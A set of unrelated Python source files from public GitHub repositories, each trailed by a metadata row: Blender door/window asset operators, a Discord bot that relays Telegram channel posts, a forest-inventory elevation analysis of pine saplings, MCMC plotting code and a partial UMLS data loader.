traits.DatasetABC.__init__(self, self, language=language, device=device)
traits.Query.__init__(self, self)
traits.Transform.__init__(
self,
parent=self,
buffer_size=buffer_size,
min_len=min_len,
max_len=max_len,
chunk_size=chunk_size,
sentences=sentences,
skip=(),
allow_con_dup=False,
mask=False,
)
def transform_sentence(self, s: List[str]) -> np.ndarray:
"""
Transform sentence of string to integers.
This method is different from the one in training because we
don't want to add new words to the language. Unknown words will
be added to UNKNOWN.
Parameters
----------
s : list[str]
A sequence of any length.
Returns
-------
s : np.array[int]
A -1 padded sequence of shape (self.max_len, )
"""
assert self.max_len is not None
s = list(filter(lambda x: len(x) > 0, [self.language.clean(w) for w in s]))
# All the sentences are -1 padded
idx = np.ones(self.max_len + 1) * -1
last_w = None
if len(s) > self.max_len or len(s) < self.min_len:
# prevents returning an IndexError during inference
idx[0] = Tokens.SOS
idx[1] = Tokens.EOS
# will be removed jit
return idx
i = -1
for w in s:
if not self.allow_duplicates:
if w == last_w:
last_w = w
continue
last_w = w
# Only increment if we don't continue
i += 1
if w not in self.language.w2i:
w = Tokens.UNKNOWN.name
idx[i] = self.language.w2i[w]
idx[i + 1] = 0
return np.array(idx)
| ritchie46/sequence | sequence/data/utils.py | utils.py | py | 11,796 | python | en | code | 10 | github-code | 13 |
8093465008 | import bpy
import os
import subprocess
import codecs
from . import paths_doors_windows
from . import utils_doors_windows
from pc_lib import pc_types, pc_unit, pc_utils
def get_current_view_rotation(context):
'''
Gets the current view rotation for creating thumbnails
'''
for window in context.window_manager.windows:
screen = window.screen
for area in screen.areas:
if area.type == 'VIEW_3D':
for space in area.spaces:
if space.type == 'VIEW_3D':
return space.region_3d.view_rotation
return (0,0,0)
class doors_windows_OT_create_new_door_window_asset(bpy.types.Operator):
bl_idname = "doors_windows.create_new_asset"
bl_label = "Create New Asset"
bl_description = "This will create a new asset of the specified type"
asset_type: bpy.props.StringProperty(name="Asset Type",description="Type of Asset to Create")
def execute(self, context):
if self.asset_type == 'ENTRY_DOOR_FRAME':
assembly = pc_types.Assembly()
assembly.create_assembly("Entry Door Frame")
assembly.obj_x.location.x = pc_unit.inch(36)
assembly.obj_y.location.y = pc_unit.inch(6)
assembly.obj_z.location.z = pc_unit.inch(90)
assembly.obj_bp.select_set(True)
assembly.add_prompt("Door Frame Width",'DISTANCE',pc_unit.inch(3))
context.view_layer.objects.active = assembly.obj_bp
if self.asset_type == 'ENTRY_DOOR_PANEL':
assembly = pc_types.Assembly()
assembly.create_assembly("Entry Door Panel")
assembly.obj_x.location.x = pc_unit.inch(36)
assembly.obj_y.location.y = pc_unit.inch(1.5)
assembly.obj_z.location.z = pc_unit.inch(90)
assembly.obj_bp.select_set(True)
assembly.add_prompt("Hide",'CHECKBOX',False)
dim_x = assembly.obj_x.pyclone.get_var('location.x','dim_x')
x1 = assembly.add_empty('X1')
x1.empty_display_size = .01
x1.pyclone.loc_x('IF(dim_x>0,0,dim_x)',[dim_x])
x2 = assembly.add_empty('X2')
x2.empty_display_size = .01
x2.pyclone.loc_x('IF(dim_x>0,dim_x,0)',[dim_x])
context.view_layer.objects.active = assembly.obj_bp
if self.asset_type == 'WINDOW_FRAME':
assembly = pc_types.Assembly()
assembly.create_assembly("Window Frame")
# assembly.obj_bp.location.z = pc_unit.inch(48)
assembly.obj_x.location.x = pc_unit.inch(36)
assembly.obj_y.location.y = pc_unit.inch(6)
assembly.obj_z.location.z = pc_unit.inch(48)
assembly.obj_bp.select_set(True)
assembly.add_prompt("Left Window Frame Width",'DISTANCE',pc_unit.inch(3))
assembly.add_prompt("Right Window Frame Width",'DISTANCE',pc_unit.inch(3))
assembly.add_prompt("Top Window Frame Width",'DISTANCE',pc_unit.inch(3))
assembly.add_prompt("Bottom Window Frame Width",'DISTANCE',pc_unit.inch(3))
context.view_layer.objects.active = assembly.obj_bp
if self.asset_type == 'WINDOW_INSERT':
assembly = pc_types.Assembly()
assembly.create_assembly("Window Insert")
# assembly.obj_bp.location.z = pc_unit.inch(48)
assembly.obj_x.location.x = pc_unit.inch(36)
assembly.obj_y.location.y = pc_unit.inch(6)
assembly.obj_z.location.z = pc_unit.inch(48)
assembly.obj_bp.select_set(True)
return {'FINISHED'}
class doors_windows_OT_add_handle_to_scene(bpy.types.Operator):
bl_idname = "doors_windows.add_handle_to_scene"
bl_label = "Add Handle to Scene"
bl_description = "This will add the current handle to the scene"
asset_type: bpy.props.StringProperty(name="Asset Type",description="Type of Asset to Create")
def execute(self, context):
coll = context.view_layer.active_layer_collection.collection
props = utils_doors_windows.get_scene_props(bpy.context.scene)
root_path = paths_doors_windows.get_entry_door_handle_path()
handle_path = os.path.join(root_path, props.entry_door_handle_category, props.entry_door_handle + ".blend")
door_handle_obj = pc_utils.get_object(handle_path)
coll.objects.link(door_handle_obj)
return {'FINISHED'}
class doors_windows_OT_save_asset_to_library(bpy.types.Operator):
bl_idname = "doors_windows.save_asset_to_library"
bl_label = "Save Current Asset to Library"
bl_description = "This will save the current file to the active library"
bl_options = {'UNDO'}
asset_type: bpy.props.StringProperty(name="Asset Type",description="Type of Asset to Save")
@classmethod
def poll(cls, context):
if context.object:
return True
else:
return False
def invoke(self,context,event):
wm = context.window_manager
return wm.invoke_props_dialog(self, width=300)
def create_thumbnail_script(self,asset_path,asset_name,view_rotation):
file = codecs.open(os.path.join(bpy.app.tempdir,"thumb_temp.py"),'w',encoding='utf-8')
file.write("import bpy\n")
file.write("import os\n")
file.write("import sys\n")
# file.write("import " + __package__ + "\n")
file.write("path = r'" + os.path.join(asset_path,asset_name) + "'\n")
file.write("bpy.ops.object.select_all(action='DESELECT')\n")
file.write("with bpy.data.libraries.load(r'" + os.path.join(asset_path,asset_name + ".blend") + "') as (data_from, data_to):\n")
file.write(" data_to.objects = data_from.objects\n")
file.write("for obj in data_to.objects:\n")
file.write(" bpy.context.view_layer.active_layer_collection.collection.objects.link(obj)\n")
# file.write(" " + __package__ + ".home_builder_pointers.assign_materials_to_object(obj)\n")
file.write(" obj.select_set(True)\n")
file.write("bpy.context.scene.camera.rotation_euler = " + str(view_rotation) + "\n")
file.write("bpy.ops.view3d.camera_to_view_selected()\n")
#RENDER
file.write("render = bpy.context.scene.render\n")
file.write("render.use_file_extension = True\n")
file.write("render.filepath = path\n")
file.write("bpy.ops.render.render(write_still=True)\n")
file.close()
return os.path.join(bpy.app.tempdir,'thumb_temp.py')
def create_save_object_script(self,save_dir,asset):
source_file = bpy.data.filepath
file = codecs.open(os.path.join(bpy.app.tempdir,"save_temp.py"),'w',encoding='utf-8')
file.write("import bpy\n")
file.write("import os\n")
file.write("for mat in bpy.data.materials:\n")
file.write(" bpy.data.materials.remove(mat,do_unlink=True)\n")
file.write("for obj in bpy.data.objects:\n")
file.write(" bpy.data.objects.remove(obj,do_unlink=True)\n")
file.write("bpy.context.preferences.filepaths.save_version = 0\n")
file.write("with bpy.data.libraries.load(r'" + source_file + "') as (data_from, data_to):\n")
file.write(" data_to.objects = ['" + asset.name + "']\n")
file.write("for obj in data_to.objects:\n")
file.write(" bpy.context.view_layer.active_layer_collection.collection.objects.link(obj)\n")
# file.write(" obj.select_set(True)\n")
# file.write(" if obj.type == 'CURVE':\n")
# file.write(" bpy.context.scene.camera.rotation_euler = (0,0,0)\n")
# file.write(" obj.data.dimensions = '2D'\n")
# file.write(" bpy.context.view_layer.objects.active = obj\n")
file.write("bpy.ops.wm.save_as_mainfile(filepath=r'" + os.path.join(save_dir,asset.name) + ".blend')\n")
file.close()
return os.path.join(bpy.app.tempdir,'save_temp.py')
def create_save_assembly_script(self,save_dir,asset):
source_file = bpy.data.filepath
file = codecs.open(os.path.join(bpy.app.tempdir,"save_temp.py"),'w',encoding='utf-8')
file.write("import bpy\n")
file.write("import os\n")
file.write("for mat in bpy.data.materials:\n")
file.write(" bpy.data.materials.remove(mat,do_unlink=True)\n")
file.write("for obj in bpy.data.objects:\n")
file.write(" bpy.data.objects.remove(obj,do_unlink=True)\n")
file.write("bpy.context.preferences.filepaths.save_version = 0\n")
file.write("with bpy.data.libraries.load(r'" + source_file + "') as (data_from, data_to):\n")
file.write(" data_to.objects = data_from.objects\n")
file.write("for obj in data_to.objects:\n")
file.write(" bpy.context.view_layer.active_layer_collection.collection.objects.link(obj)\n")
file.write("bpy.ops.wm.save_as_mainfile(filepath=r'" + os.path.join(save_dir,asset.name) + ".blend')\n")
file.close()
return os.path.join(bpy.app.tempdir,'save_temp.py')
def get_library_path(self,context):
props = utils_doors_windows.get_scene_props(context.scene)
if self.asset_type == 'ENTRY_DOOR_PANEL':
return os.path.join(paths_doors_windows.get_entry_door_panel_path(),props.entry_door_panel_category)
if self.asset_type == 'ENTRY_DOOR_FRAME':
return os.path.join(paths_doors_windows.get_entry_door_frame_path(),props.entry_door_frame_category)
if self.asset_type == 'ENTRY_DOOR_HANDLE':
return os.path.join(paths_doors_windows.get_entry_door_handle_path(),props.entry_door_handle_category)
if self.asset_type == 'WINDOW_FRAME':
return os.path.join(paths_doors_windows.get_window_frame_path(),props.window_frame_category)
if self.asset_type == 'WINDOW_INSERT':
return os.path.join(paths_doors_windows.get_window_insert_path(),props.window_insert_category)
def get_thumbnail_path(self):
return os.path.join(os.path.dirname(__file__),"thumbnail.blend")
def execute(self, context):
current_rotation = get_current_view_rotation(context)
rotation = (current_rotation.to_euler().x,current_rotation.to_euler().y,current_rotation.to_euler().z)
if bpy.data.filepath == "":
bpy.ops.wm.save_as_mainfile(filepath=os.path.join(bpy.app.tempdir,"temp_blend.blend"))
path = self.get_library_path(context)
if self.asset_type in {'ENTRY_DOOR_PANEL','ENTRY_DOOR_FRAME','WINDOW_FRAME','WINDOW_INSERT'}:
save_script_path = self.create_save_assembly_script(path, self.get_asset(context))
command = [bpy.app.binary_path,"-b","--python",save_script_path]
subprocess.call(command)
tn_script_path = self.create_thumbnail_script(path,self.get_asset(context).name,rotation)
command = [bpy.app.binary_path,self.get_thumbnail_path(),"-b","--python",tn_script_path]
subprocess.call(command)
if self.asset_type == 'ENTRY_DOOR_HANDLE':
save_script_path = self.create_save_object_script(path, self.get_asset(context))
command = [bpy.app.binary_path,"-b","--python",save_script_path]
subprocess.call(command)
tn_script_path = self.create_thumbnail_script(path,self.get_asset(context).name,rotation)
command = [bpy.app.binary_path,self.get_thumbnail_path(),"-b","--python",tn_script_path]
subprocess.call(command)
return {'FINISHED'}
def get_asset(self,context):
if self.asset_type in {'ENTRY_DOOR_PANEL','ENTRY_DOOR_FRAME','WINDOW_FRAME','WINDOW_INSERT'}:
return pc_utils.get_bp_by_tag(context.object,'IS_ASSEMBLY_BP')
if self.asset_type == 'ENTRY_DOOR_HANDLE':
return context.object
def draw(self, context):
layout = self.layout
path = self.get_library_path(context)
files = os.listdir(path) if os.path.exists(path) else []
asset_name = self.get_asset(context).name
layout.label(text="Asset Name: " + asset_name)
if asset_name + ".blend" in files or asset_name + ".png" in files:
layout.label(text="File already exists",icon="ERROR")
classes = (
doors_windows_OT_create_new_door_window_asset,
doors_windows_OT_save_asset_to_library,
doors_windows_OT_add_handle_to_scene,
)
register, unregister = bpy.utils.register_classes_factory(classes) | CreativeDesigner3D/home_builder | assets/products/sample_doors_windows/ops_doors_windows.py | ops_doors_windows.py | py | 12,668 | python | en | code | 47 | github-code | 13 |
70706687698 | import yaml
import sys
import discord
import os
from dotenv import load_dotenv
# Loading configuration
load_dotenv()
with open('config.yml', 'rb') as f:
config = yaml.safe_load(f)
# Discord initialization
intents = discord.Intents.default()
discord_client = discord.Client(intents=intents)
# Get our data from argument
message = sys.argv[1]
data = message.split("@")
@discord_client.event
async def on_ready():
print('We have logged in as {0.user}'.format(discord_client))
# Channel id's
channels_cybersport = ["-1001421655869"]
channels_lviv = ["-1001254374439"]
channels_ukraine = ["-1001483876482","-1001308491047"]
channels_halyava = ["-1001374759118"]
# Get channel to send message
channel_trash = discord_client.get_channel(int(os.getenv("DISCORD_TRASH_CHANNEL")))
if data[0] in channels_cybersport:
channel_send = discord_client.get_channel(int(os.getenv("DISCORD_CYBERSPORT_CHANNEL")))
elif data[0] in channels_lviv and "Львівич | Підписатися" in data[1]:
data[1] = data[1].replace("Львівич | Підписатися","")
channel_send = discord_client.get_channel(int(os.getenv("DISCORD_LVIV_CHANNEL")))
elif data[0] in channels_ukraine and ("ЦЕНТР" in data[1] or "Інформує Україна" in data[1]):
data[1] = data[1].replace("ЦЕНТР","").replace("Інформує Україна","")
channel_send = discord_client.get_channel(int(os.getenv("DISCORD_UKRAINE_CHANNEL")))
elif data[0] in channels_halyava and "Получить игру можно бесплатно" in data[1]:
channel_send = discord_client.get_channel(int(os.getenv("DISCORD_HALYAVA_CHANNEL")))
else:
channel_send = channel_trash
# Sending messages
embed = discord.Embed(description=data[1])
if data[2] != "":
image = discord.File(data[2])
if data[2].lower().endswith(".mp4"):
embed.set_image(url="attachment://"+data[2])
await channel_send.send(embed=embed, file=discord.File(data[2]))
else:
uploaded_image = await channel_trash.send(file=image)
image_url = uploaded_image.attachments[0].url
embed.set_image(url=image_url)
await channel_send.send(embed=embed)
else:
await channel_send.send(embed=embed)
if len(data)>3:
for i in range (3,len(data)):
embed = discord.Embed()
embed.set_image(url="attachment://"+data[i])
await channel_send.send(embed=embed, file=discord.File(data[i]))
# Exit Bot
quit()
discord_client.run(os.getenv("TOKEN")) | Athexe/David-Bot | discord_messager.py | discord_messager.py | py | 2,524 | python | en | code | 0 | github-code | 13 |
27702446053 | """
Title: Open/parse FIA data
Author: Tony Chang
"""
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import norm
import matplotlib.mlab as mlab
def plot_fia(data):
plt.scatter(data['LON'],data['LAT'])
return()
def data_AOA(AOA, plot):
#returns the data filtered by bounding box AOA
lat = plot['LAT']
lon = plot['LON']
lat_cut = (lat>=AOA[1]) & (lat<=AOA[3])
lon_cut = (lon>=AOA[0]) & (lon<=AOA[2])
return(plot[lat_cut & lon_cut])
def remove_dup(data):
#sorts the unique CN values
u, i = np.unique(data['CN'], return_index=True)
return(data[i])
workspace = 'E:\\FIA\\'
name = 'fia_obs_clean4.10.2014.csv'
filename = '%s%s' %(workspace,name)
fia = np.genfromtxt(filename, delimiter = ',', names = True)
xmax = -108.263
xmin = -112.436
ymin = 42.252
ymax = 46.182
AOA = [xmin, ymin, xmax, ymax] #specify the bounds for the FIA data
prevalence = []
n = []
r = np.arange(1,10,0.1)
for i in r:
DBHlimit = i# 1.57 #decide on the limit that define "sub-adult" Note: change from 3" to 2" only looses 17 trees...
ht_limit = 12
elev_limt = 4500 #5000, 5500, 6000, 6500, 7000 #whitebark pine limit seems to be at 7000
wbp_code = 101
limber_code = 113
ffia = data_AOA(AOA, fia)
wbp = ffia[(np.where(ffia['SPCD']==wbp_code)[0])]
lbp = ffia[(np.where(ffia['SPCD']==limber_code)[0])]
sap = wbp[(wbp['DIA'] < DBHlimit) & (wbp['HT'] <ht_limit)]
lim_sap = lbp[(lbp['DIA'] < DBHlimit) & (lbp['HT'] <ht_limit) & (lbp['ELEV'] )]
absent = ffia[(np.where(ffia['SPCD']!=wbp_code)[0])]
uni_sap = remove_dup(sap)
uni_lim_sap = remove_dup(lim_sap)
uni_abs = remove_dup(absent)
n_sap = len(uni_sap)
n.append(n_sap)
n_lbp = len(uni_lim_sap)
n_abs = len(uni_abs)
prevalence.append( (n_sap + n_lbp) / n_abs)
#===================================================#
#==================PRE-ANALYSIS=====================#
#===================================================#
#check number of saplings
print(len(uni_sap), len(uni_lim_sap))
plt.plot(r, n)
plt.plot(r, prevalence)
#consider the distribution of each species by elevation
# species : code
# pinus contorta : 108
# pseudotsuga menziesii : 202
# subalpine fir : 19
# whitebark pine = 101
# limber pine = 113
pcont_code = 108
pmenz_code = 202
sfir_code = 19
all_pcont = remove_dup(ffia[(np.where(ffia['SPCD']==pcont_code)[0])])
all_pmenz = remove_dup(ffia[(np.where(ffia['SPCD']==pmenz_code)[0])])
all_sfir = remove_dup(ffia[(np.where(ffia['SPCD']==sfir_code)[0])])
all_wbp = remove_dup(ffia[(np.where(ffia['SPCD']==wbp_code)[0])])
all_lbp = remove_dup(ffia[(np.where(ffia['SPCD']==limber_code)[0])])
#select the saplings
DBHlimit = 1.57
ht_limit = 12
pcont = all_pcont[(all_pcont['DIA'] < DBHlimit) & (all_pcont['HT'] <ht_limit)]
pmenz = all_pmenz[(all_pmenz['DIA'] < DBHlimit) & (all_pmenz['HT'] <ht_limit)]
sfir = all_sfir[(all_sfir['DIA'] < DBHlimit) & (all_sfir['HT'] <ht_limit)]
wbp = all_wbp[(all_wbp['DIA'] < DBHlimit) & (all_wbp['HT'] <ht_limit)]
lbp = all_lbp[(all_lbp['DIA'] < DBHlimit) & (all_lbp['HT'] <ht_limit)] #& (lbp['ELEV'] )]
#distributions seem normal so solve for the parameters...
#mu and sigma
pcont_para = norm.fit(pcont['ELEV'])
pmenz_para = norm.fit(pmenz['ELEV'])
sfir_para = norm.fit(sfir['ELEV'])
wbp_para = norm.fit(wbp['ELEV'])
lbp_para = norm.fit(lbp['ELEV'])
pcont_y = mlab.normpdf(pcont_dist[1], pcont_para[0], pcont_para[1])
pmenz_y = mlab.normpdf(pmenz_dist[1], pmenz_para[0], pmenz_para[1])
sfir_y = mlab.normpdf(sfir_dist[1], sfir_para[0], sfir_para[1])
wbp_y = mlab.normpdf(wbp_dist[1], wbp_para[0], wbp_para[1])
lbp_y = mlab.normpdf(lbp_dist[1], lbp_para[0], lbp_para[1])
#plot the different elevation histograms
plt.rcParams['figure.figsize'] = (18.0, 12.0)
b = 25
pmenz_dist = plt.hist(pmenz['ELEV'], bins = b, color = 'blue', alpha = 0.4, label = ' $\it pseudotsuga\,menziesii\,(n=%i,\mu =%.2f, \sigma=%.2f)$'%(len(pmenz),pmenz_para[0],pmenz_para[1]))
pcont_dist = plt.hist(pcont['ELEV'], bins = b, color = 'red', alpha = 0.4, label = '$\it pinus\,contorta\, (n=%i,\mu =%.2f, \sigma=%.2f)$'%(len(pcont),pcont_para[0],pcont_para[1]))
sfir_dist = plt.hist(sfir['ELEV'], bins = b, color = 'green', alpha = 0.4, label = ' $ \it abies\,lasiocarpa\, (n=%i,\mu =%.2f, \sigma=%.2f)$'%(len(sfir),sfir_para[0],sfir_para[1]))
wbp_dist = plt.hist(wbp['ELEV'], bins = b, color = 'yellow', alpha = 0.4, label = ' $ \it pinus\,albicaulis\, (n=%i,\mu =%.2f, \sigma=%.2f)$'%(len(wbp),wbp_para[0],wbp_para[1]))
lbp_dist = plt.hist(lbp['ELEV'], bins = b, color = 'black', alpha = 0.4, label = ' $ \it pinus\,flexilis\, (n=%i,\mu =%.2f, \sigma=%.2f)$'%(len(lbp),lbp_para[0],lbp_para[1]))
plt.grid()
plt.legend(loc = 'upper left')
plt.ylabel('Frequency')
plt.xlabel('Elevation')
#plot the lines
pmenz_wt = (pmenz_dist[1][1]-pmenz_dist[1][0])*(len(pmenz))
pcont_wt = (pcont_dist[1][1]-pcont_dist[1][0])*(len(pcont))
sfir_wt = (sfir_dist[1][1]-sfir_dist[1][0])*(len(sfir))
wbp_wt = (wbp_dist[1][1]-wbp_dist[1][0])*(len(wbp))
lbp_wt = (lbp_dist[1][1]-lbp_dist[1][0])*(len(lbp))
plt.plot(pmenz_dist[1], pmenz_y * pmenz_wt, color = 'blue', lw = 2)
plt.plot(pcont_dist[1], pcont_y * pcont_wt, color = 'red', lw = 2)
plt.plot(sfir_dist[1], sfir_y * sfir_wt, color = 'green', lw = 2)
plt.plot(wbp_dist[1], wbp_y * wbp_wt, color = 'yellow', lw = 2)
plt.plot(lbp_dist[1], lbp_y * lbp_wt, color = 'black', lw = 2)
plt.savefig('hist_sap.png', transparent=True, bbox_inches='tight', pad_inches=0)
#output is for the GYE range of the species
#=============================================================#
'''
What can we consider using these data histograms?
We can first see that the apparent (if we believe the data is unbiased)
lower bounds of whitebark pine is around 7000' in elevation.
For limber pine, this is well within the mean of the sample population, therefore
it seems unfair to believe that any sapling that appears for limber pine above 7000' should
just be characterized as whitebark. However, if all the field measurements sub-adult measurements
below 7000' were classified as limberpine, it may be correct...
Perhaps we should just consider the saplings first?
''' | tonychangmsu/Python_Scripts | eco_models/wbp/FIA_piekielek_extractor.py | FIA_piekielek_extractor.py | py | 6,102 | python | en | code | 0 | github-code | 13 |
37175485494 | import sys, os
import six
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'..', 'modules', 'MCcubed', 'MCcubed', 'plots', ''))
from mcplots import trace, pairwise, histogram
__all__ = ["mc3plots"]
def mc3plots(output, burnin, thinning, nchains, uniform, molfit,
out_spec, parnames, stepsize, date_dir, fnames, fext='.png'):
"""
Reformats the MC3 output file so that the log(abundance) factor is with
respect to molar fraction, rather than the initial values (as MC3 does).
Calls trace(), pairwise(), and histogram() using these values.
Parameters
----------
output : string. Path to MC3 output.npy file.
burnin : int. Number of burn-in iterations.
thinning: int. Thinning factor of the chains (use every thinning-th
iteration) used for plotting.
uniform : array-like. If not None, set uniform abundances with the
specified values for each species.
nchains : int. Number of parallel chains in MCMC.
molfit : list, strings. Molecules to be fit by the MCMC.
out_spec: list, strings. Molecules included in atmospheric file.
parnames: list, strings. Parameter names.
stepsize: array, floats. Initial stepsizes of MCMC parameters.
date_dir: string. Path to directory where plots are to be saved.
fnames : list, strings. File names for the trace, pairwise, and histogram
plots, in that order.
fext : string. File extension for the plots to be saved.
Options: .png, .pdf
Default: .png
"""
# Load and stack results, excluding burn-in
allparams = np.load(date_dir + output)
allstack = allparams[0, :, burnin:]
for c in np.arange(1, allparams.shape[0]):
allstack = np.hstack((allstack, allparams[c, :, burnin:]))
# Subtract initial abundances if uniform, so that plots are log(abundance)
if uniform is not None:
molind = []
for imol in range(len(molfit)):
for j in range(len(out_spec.split())):
if molfit[imol]+'_' in out_spec.split()[j] and \
stepsize[-len(molfit):][imol] > 0:
molind.append(j)
if molind != []:
allstack[-len(molfit):, :] += \
np.log10(uniform[molind]).reshape(len(molind),1)
# Slice only params that are varied (remove static params)
ipar = stepsize != 0
if parnames is None:
nparams = stepsize.size
namelen = int(2+np.log10(np.amax([nparams-1,1])))
parnames = np.zeros(nparams, "|S%d"%namelen if six.PY2 else "<U%d"%namelen)
for i in np.arange(nparams):
parnames[i] = "P" + str(i).zfill(namelen-1)
parnames = [parnames[i] for i in range(len(parnames)) if ipar[i]]
# Trace plot:
trace( allstack, parname=parnames, thinning=thinning,
savefile=date_dir + fnames[0] + fext,
sep=np.size(allstack[0])/nchains)
# Pairwise posteriors:
pairwise( allstack, parname=parnames, thinning=thinning,
savefile=date_dir + fnames[1] + fext)
# Histograms:
histogram(allstack, parname=parnames, thinning=thinning,
savefile=date_dir + fnames[2] + fext)
| exosports/BART | code/mc3plots.py | mc3plots.py | py | 3,265 | python | en | code | 31 | github-code | 13 |
2296248693 | """Time-related utilities."""
import re
from typing import Optional
from dateutil.relativedelta import relativedelta
_DURATION_REGEX = re.compile(
r"((?P<years>\d+?) ?(years|year|Y|y) ?)?"
r"((?P<months>\d+?) ?(months|month|m) ?)?"
r"((?P<weeks>\d+?) ?(weeks|week|W|w) ?)?"
r"((?P<days>\d+?) ?(days|day|D|d) ?)?"
r"((?P<hours>\d+?) ?(hours|hour|H|h) ?)?"
r"((?P<minutes>\d+?) ?(minutes|minute|M) ?)?"
r"((?P<seconds>\d+?) ?(seconds|second|S|s))?"
)
def parse_duration_string(duration: str) -> Optional[relativedelta]:
"""Converts a `duration` string to a relativedelta object.
The following symbols are supported for each unit of time:
- years: `Y`, `y`, `year`, `years`
- months: `m`, `month`, `months`
- weeks: `w`, `W`, `week`, `weeks`
- days: `d`, `D`, `day`, `days`
- hours: `H`, `h`, `hour`, `hours`
- minutes: `M`, `minute`, `minutes`
- seconds: `S`, `s`, `second`, `seconds`
The units need to be provided in descending order of magnitude.
Return None if the `duration` string cannot be parsed according to the symbols above.
"""
match = _DURATION_REGEX.fullmatch(duration)
if not match:
return None
duration_dict = {unit: int(amount) for unit, amount in match.groupdict(default=0).items()}
delta = relativedelta(**duration_dict)
return delta
| bsoyka/roboben | bot/utils/time.py | time.py | py | 1,364 | python | en | code | 2 | github-code | 13 |
17035581924 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.Position import Position
class AdGroup(object):
def __init__(self):
self._ad_user_id = None
self._crowd_condition = None
self._group_id = None
self._group_name = None
self._plan_id = None
self._position_condition = None
self._quantity = None
@property
def ad_user_id(self):
return self._ad_user_id
@ad_user_id.setter
def ad_user_id(self, value):
self._ad_user_id = value
@property
def crowd_condition(self):
return self._crowd_condition
@crowd_condition.setter
def crowd_condition(self, value):
self._crowd_condition = value
@property
def group_id(self):
return self._group_id
@group_id.setter
def group_id(self, value):
self._group_id = value
@property
def group_name(self):
return self._group_name
@group_name.setter
def group_name(self, value):
self._group_name = value
@property
def plan_id(self):
return self._plan_id
@plan_id.setter
def plan_id(self, value):
self._plan_id = value
@property
def position_condition(self):
return self._position_condition
@position_condition.setter
def position_condition(self, value):
if isinstance(value, list):
self._position_condition = list()
for i in value:
if isinstance(i, Position):
self._position_condition.append(i)
else:
self._position_condition.append(Position.from_alipay_dict(i))
@property
def quantity(self):
return self._quantity
@quantity.setter
def quantity(self, value):
self._quantity = value
def to_alipay_dict(self):
params = dict()
if self.ad_user_id:
if hasattr(self.ad_user_id, 'to_alipay_dict'):
params['ad_user_id'] = self.ad_user_id.to_alipay_dict()
else:
params['ad_user_id'] = self.ad_user_id
if self.crowd_condition:
if hasattr(self.crowd_condition, 'to_alipay_dict'):
params['crowd_condition'] = self.crowd_condition.to_alipay_dict()
else:
params['crowd_condition'] = self.crowd_condition
if self.group_id:
if hasattr(self.group_id, 'to_alipay_dict'):
params['group_id'] = self.group_id.to_alipay_dict()
else:
params['group_id'] = self.group_id
if self.group_name:
if hasattr(self.group_name, 'to_alipay_dict'):
params['group_name'] = self.group_name.to_alipay_dict()
else:
params['group_name'] = self.group_name
if self.plan_id:
if hasattr(self.plan_id, 'to_alipay_dict'):
params['plan_id'] = self.plan_id.to_alipay_dict()
else:
params['plan_id'] = self.plan_id
if self.position_condition:
if isinstance(self.position_condition, list):
for i in range(0, len(self.position_condition)):
element = self.position_condition[i]
if hasattr(element, 'to_alipay_dict'):
self.position_condition[i] = element.to_alipay_dict()
if hasattr(self.position_condition, 'to_alipay_dict'):
params['position_condition'] = self.position_condition.to_alipay_dict()
else:
params['position_condition'] = self.position_condition
if self.quantity:
if hasattr(self.quantity, 'to_alipay_dict'):
params['quantity'] = self.quantity.to_alipay_dict()
else:
params['quantity'] = self.quantity
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AdGroup()
if 'ad_user_id' in d:
o.ad_user_id = d['ad_user_id']
if 'crowd_condition' in d:
o.crowd_condition = d['crowd_condition']
if 'group_id' in d:
o.group_id = d['group_id']
if 'group_name' in d:
o.group_name = d['group_name']
if 'plan_id' in d:
o.plan_id = d['plan_id']
if 'position_condition' in d:
o.position_condition = d['position_condition']
if 'quantity' in d:
o.quantity = d['quantity']
return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/AdGroup.py | AdGroup.py | py | 4,596 | python | en | code | 241 | github-code | 13 |
39778030716 | import os
import pandas as pd
import logging
from tqdm import tqdm
from typing import Union, Optional
from logging import getLogger
tqdm.pandas()
logger = logging.getLogger(__file__)
formatter = logging.Formatter(
"%(asctime)s [%(levelname)s] %(message)s", "%Y-%m-%d %H:%M:%S"
)
# from config import umls_api_key
class UmlsMappings(object):
def __init__(
self,
umls_dir="/Users/david/umls/",
umls_api_key="",
force_reprocess=False,
debug=False,
):
self.umls_dir = umls_dir
self.debug = debug
self.force_reprocess = force_reprocess
if not os.path.isfile(umls_dir + "MRCONSO.RRF"):
self._download_umls(umls_api_key)
self._load_umls()
if self.using_cached:
self._load_type_abbrevs()
else:
self._load_types()
self._merge_types()
self._add_definitions()
# self.cui_to_aliases = self.get_aliases()
# self.cui_to_types = self._process_types()
# self.cui_to_groups = self._process_groups()
self._cache_umls()
def _download_umls(self, api_key):
if api_key == "":
raise ValueError(
"""Please add valid UTS API key to config.py! \
(For instructions on how to obtain a UTS API key,\
please see https://documentation.uts.nlm.nih.gov/automating-downloads.html"""
)
else:
pass
def _download_semtypes(self, api_key):
"""
Download semantic type files from UMLS
"""
# Semantic network files
# https://lhncbc.nlm.nih.gov/semanticnetwork/download/sn_current.tgz
# Semantic Group Files
# https://lhncbc.nlm.nih.gov/semanticnetwork/download/SemGroups.txt
pass
def _add_definitions(self):
'''
Add definitions of entities where available
'''
umls_definitions = pd.read_csv(
os.path.join(self.umls_dir, "MRDEF.RRF"),
sep="|",
usecols=[0,1,4,5,],
names=["cui", "aui", "sab", 'def',],
)
self.umls = self.umls.join(umls_definitions.set_index(['cui','aui','sab']), on=['cui','aui','sab'])
def _load_umls(self):
"""
Load UMLS MRCONSO.RRF
"""
self.using_cached = False
cache_path = os.path.join(self.umls_dir, ".cached_df.feather")
if os.path.isfile(cache_path) and not self.force_reprocess:
print(f"Loading cached UMLS data from {cache_path}")
self.umls = pd.read_feather(cache_path)
self.using_cached = True
return
print("Loading UMLS dataset. This may take a few minutes")
col_names = [
"cui",
"lang",
"term_status",
"lui",
"stt",
"sui",
"ispref",
"aui",
"saui",
"scui",
"sdui",
"sab",
"tty",
"code",
"alias",
"srl",
"suppress",
"cvf",
"null_col",
]
cols_to_use = [
"cui",
"sab",
"sdui",
"scui",
"alias",
"lang",
"ispref",
"tty",
# "lui",
# "sui",
"aui",
# "saui",
]
if self.debug:
df = next(
pd.read_csv(
os.path.join(self.umls_dir, "MRCONSO.RRF"),
